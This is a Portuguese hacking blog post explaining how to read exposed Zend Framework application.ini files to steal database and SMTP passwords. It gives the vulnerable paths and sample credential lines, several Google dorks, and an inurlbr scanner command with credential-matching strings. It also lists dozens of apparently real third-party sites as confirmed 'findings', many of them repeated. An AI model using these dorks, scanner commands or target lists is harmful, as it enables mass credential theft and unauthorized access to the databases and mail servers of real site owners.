Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

quarta-feira, 16 de julho de 2014

Explorando falha no Zend Framework Full Info Disclosure

Explorando Full Info Disclosure

Explorando falha no Zend Framework Full Info Disclosure

Tal falha disponibiliza a leitura do arquivo ini dentro de aplicações web que usam  Zend Framework, tais aquivos contem senhas de bancos e smtp.

Vulnerabilidade[0]=> http://target.com/application/configs/{arquivo}.ini
Ex:
http://target.com/application/configs/application.ini
http://target.com/application/configs/db.ini
http://target.com/application/configs/config.ini

Conteúdo de arquivo podemos encontrar os seguintes parâmetros.


//Dados de acesso banco
resources.db.params.host = "mysql.taget.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123455"


//E também dados de acesso smtp
resources.mail.transport.host ="smtp.target.com.br"
resources.mail.transport.auth = "loginre"
sources.mail.transport.username = "wangxydlutre"
sources.mail.transport.password = "12333"


DORK[0]=> inurl:/application/configs/application.ini

DORK[1]=>
site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

DORK[2]=> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

DORK[3]=> inurl:/configs/ "params.password" db.ini ext:ini

DORK[4]=> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password



[+][ COMMND SCANNER INURLBR ]
./inurlbr.php --dork 'site:com ext:ini inurl:/application/  -github -assembla -inurl:mozilla -inurl:svn "params.password"'  -s zend.txt -q 1,6,7,14,22


[+][ VALIDATION ZEND FRAMEWORK ]
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';

0xExemplo de achado:

0xExemplo de achado: zend

https://www.thoex.com/urrunarrak-handball/application/configs/application.ini?
https://www.thoex.com/urrunarrak2/application/configs/application.ini?
http://www.rydusa.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?


http://www.getsocialwithrb.com/rec0219/airwick/application/configs/application.ini
http://www.aps-cctv.com/boardPhotos/application.ini
http://snobmonkey.com/test/application/configs/application.ini
http://velcro-lab.com/touch/application/configs/application.ini
http://www.ratcmatrimony.com/application/configs/application.ini
http://ucgoz.com/deneme2/application/configs/application.ini
http://ifood.introserver.com/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/admin/application/configs/application.ini
http://www.altusinfra.com/application/configs/application.ini
http://www.thenamesticker.com/application/configs/application.ini
http://stasdavydov.com/price_cmp/application/configs/application.ini
https://www.mitylite.com/application/configs/application.ini
http://dev.blancali.com/_old2/application/configs/application.ini
http://city-immobilier.com/application/configs/application.ini
http://www.emotionla.com/staging/vivanda/vivanda-mobile/application/configs/application.ini
http://23sec.com/api/application/configs/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
http://www.rydusa.com/application/configs/application.ini
http://www.prod2020.com/_hybris-cra/application/configs/application.ini
http://xolotlti.com/fabricadecine/application/configs/application.ini
http://www.test.unibox.com/application/configs/application.ini
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini
http://users.spytosave.com/spyapp/application/configs/application.ini
http://www.monigrafica.com/application/configs/application.ini
http://clossmancommunications.com/frapi/admin/application/config/application.ini
http://archi-tech-media.com/thedigitalkingdom/application/configs/application.ini
http://www.kreatera.com/library/Benux/Application/configs/application.ini
http://li258-109.members.linode.com/application/configs/application.ini
http://www.techques.com/question/1-4484965/How-to-set-database-time-zone-in-application.ini
http://bizarrefx.com/bfx/searchd/application/configs/application.ini
http://www.hellobrothers.com/jobs/application.ini
http://www.ovdev.mit-consult.com/exc1/application/configs/application.ini
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini
http://www.digilibro.com/Crisol/RestServer/application/configs/application.ini
http://secure.vfwebserver.com/ewe/application/configs/application.ini
http://ihuntyou.com/agrobrain/trunk/application/configs/application.ini
http://ronlinecdn.com/st/application/configs/application.ini
http://yodpolitician.yodsoft.com/application/configs/application.ini
http://kerberosdevelopment.com/centurion/application/configs/db.ini
http://www.dev-stagingserver.com/noophy/application/configs/application.ini
http://www.intell-sol.com/subdomains/wandelion/admin/application/configs/application.ini
http://paintourhome.com/application/configs/application.ini
http://www.mywebsitedemos.com/broomberg/application/configs/application.ini
http://fidelcrm.com/fbconnect/zblog/application/configs/application.ini
http://developermalik.com/chad/application/configs/application.ini
http://developermalik.com/uPolitics/application/configs/application.ini
http://km.comuf.com/application/configs/application.ini
http://qljsystems.com/doctrine2/ralphschindler-NOLASnowball-3c9f906/application/configs/application.ini
http://50-87-21-130.unifiedlayer.com/astonis/application/configs/application.ini
http://bepcongnghiepjsc.com/application/configs/application.ini
http://galaxybis.com/demos/zf1/application/configs/application.ini
http://masdag.com/watchit/application/configs/config.ini
http://www.comsucopia.com/application/configs/application.ini
http://campusrain.com/wow/application/configs/application.ini
http://www.myanmar-restaurants.com/updates/myanmar/stage/application/configs/sites/myanmar-updates.ini
http://churchcims.com/staging/application/configs/application.ini
http://hashib23.uniquewebers.com/hospital/application/configs/application.ini
http://support.orioly.com/svjetskiputnik.hr/application/configs/application.ini
http://tmh.riktamtech.com/blinkword/application/configs/application.ini
http://shopping.idincorp.com/application/configs/application.ini
https://www.arabforwarding.com/vhosts/loyacjordan.org/httpdocs/loyac/application/configs/application.ini
https://www.arabforwarding.com/vhosts/__www.fnms-medical.com/httpdocs/application/configs/application.ini
http://elamatute.com/application/configs/application.ini
http://www.originalsexnetwork.com/application/configs/application.ini
http://www.palstu.com/contactus2/application/configs/application.ini
http://web.ontuts.com/wp-content/uploads/tutoriales/zendframework/zendframework_layouts/application/config/application.ini
https://daralyasmine.com/vhosts/daralyasmine.com/httpdocs/application/configs/application.ini
http://www.tributosonline.com/application/configs/application.ini
http://www.nichequotes.com/zend/application/config.ini
http://webkathon.com/alumni/application/configs/application.ini
http://web1.kindlebit.com/PHP-Team/vijay/don/codecanyon-4210316-monsterfile-multiuser-file-management/MonsterFile/application/configs/monster.ini
http://www.investmysite.com/application/config/config_db.ini
http://dulichcampuchiagiare.com/application/configs/application.ini
http://eshopbox.com/checkout/application/configs/application.ini
http://www.oi915.com/application/modules/admin/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
http://www.prod2020.com/france-tv/application/configs/db.ini
http://amdinner.com/admin/application/application.ini
http://www.emotionla.com/clientes/plazavea/plazavea-qr/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/application/configs/application.ini
http://www.palstu.com/tawjihi/application/configs/application.ini
http://ronlinecdn.com/sap/application/configs/application.ini
http://myanmar-restaurants.com/updates/movie/prod/application/configs/sites/myanmar-updates.ini
Exploit:
http://www.exploit-db.com/exploits/29921/

9 comentários:

  1. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  2. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  3. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  4. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  5. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  6. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  7. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  8. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  9. Este comentário foi removido por um administrador do blog.

    ResponderExcluir

............